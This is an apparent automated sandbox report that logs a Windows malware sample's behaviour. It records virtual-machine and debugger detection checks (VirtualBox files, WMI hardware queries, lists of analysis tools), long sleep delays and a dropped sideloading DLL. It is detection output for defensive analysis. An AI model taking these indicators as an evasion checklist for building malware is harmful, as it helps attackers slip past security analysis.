                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1756, type: MEMORYSTR
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: FirmwareTableInformation
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFBA88CCE64
                      Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 54BB83A
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EX
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEP
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 4E20000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: VBoxGuest
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vboxservice.exe
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vboxtray.exe
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: VBoxTrayIPC
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vboxhook.dll
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: \pipe\VBoxTrayIPC
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: VBoxMiniRdrDN
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587B4248 sldt word ptr [eax]27_2_00007DF4587B4248
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9808Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9861
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9879
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Avlogo\goopdate.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeAPI coverage: 5.7 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8972Thread sleep count: 9861 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284Thread sleep count: 9887 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 9879 > 30
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D1618 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,27_2_00007DF4586D1618
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEC126 FindFirstFileExW,52_2_00FEC126
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B926118 FindFirstFileW,FindClose,FindNextFileW,52_2_6B926118
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F7A07 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,52_2_6B8F7A07
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F78C0 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F78C0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9392EE FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,52_2_6B9392EE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F7789 FindFirstFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F7789
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8FD6DE FindFirstFileW,FindNextFileW,FindClose,52_2_6B8FD6DE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F9507 FindFirstFileW,FindNextFileW,FindClose,52_2_6B8F9507
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B91944D FindFirstFileW,FindNextFileW,FindClose,52_2_6B91944D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B778D9 GetLogicalDriveStringsW,QueryDosDeviceW,7_2_05B778D9
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45873DA34 GetSystemInfo,27_2_00007DF45873DA34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                      Source: RegSvcs.exe, 00000008.00000002.289418154368.0000000005750000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: T\0vmCI
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: svchost.exe, 00000013.00000002.289527710961.0000000002ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringOverrideDeviceIdHyper-V RAWWin32API|System Information Structures|SYSTEM_INFO|dwNumberOfProcessorsCIM_KeyErrorCleared
                      Source: svchost.exe, 00000013.00000003.289444664990.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289447615219.0000000002ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: svchost.exe, 00000013.00000003.289446657474.0000000002C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: svchost.exe, 00000013.00000002.289527263474.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289984818568.0000018CD2A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000001B.00000002.289984818568.0000018CD2A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@0
                      Source: svchost.exe, 0000001B.00000002.289984895526.0000018CD2A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDPv6 Service Provider
                      Source: svchost.exe, 00000013.00000002.289527354426.0000000002E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                      Source: svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 0000001F.00000002.289731324970.000002AA54036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                      Source: svchost.exe, 00000013.00000002.289527354426.0000000002E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\wbem\fastprox.dllC:\Windows\system32\wbem\fastprox.dlllC:\Windows\system32\wbem\fastprox.dlllHMicrosoft-Windows-Hyper-V-HypervisorFApplication Management Group Policy
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: svchost.exe, 00000013.00000002.289527753008.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Microsoft-Windows-DHCPv6-Client@Microsoft-Windows-WMPNSS-ServiceHMicrosoft-Windows-Devices-Background@Microsoft-Windows-DiskDiagnosticJMicrosoft-Windows-Fault-Tolerant-HeapJMicrosoft-Windows-GPIO-ClassExtensionHMicrosoft-Antimalware-ShieldProvider@Microsoft-Windows-DistributedCOM@Microsoft-Windows-EventCollector>Microsoft-Windows-FilterManagerHMicrosoft-Windows-Hyper-V-HypervisorDMicrosoft-Windows-IsolatedUserModeBMicrosoft-Windows-WLAN-AutoConfigFApplication Management Group Policy>Microsoft-Windows-BitLocker-APIDMicrosoft-Windows-BitLocker-Driver<Microsoft-Windows-Kernel-Power@Microsoft-Windows-Kernel-General>Microsoft-Windows-NetworkBridge>Microsoft-Windows-OverlayFilterJMicrosoft-Windows-Power-Meter-PollingJMicrosoft-Windows-ResourcePublicationHMicrosoft-Windows-SPB-ClassExtension@Microsoft-Windows-Spell-Checking>Microsoft-Windows-StartupRepair>Microsoft-Windows-TaskScheduler<Microsoft-Windows-Time-ServiceFMicrosoft-Windows-LanguagePackSetup<Microsoft-Windows-SpellChecker>Microsoft-Windows-SetupPlatform>Microsoft-Windows-USB-MAUSBHOST<Microsoft-Windows-OfflineFilesJMicrosoft-Windows-WindowsUpdateClientBMicrosoft-Windows-WLAN-AutoConfig
                      Source: mshta.exe, 00000015.00000002.289446850624.000002A6C1A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.289435758165.000002A6C1A9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289549409554.0000022B57145000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.289582823676.000002034DBFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000002.289588567207.000002034DBFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.289581825618.000002034DBFD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289665472125.0000013C0E71F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
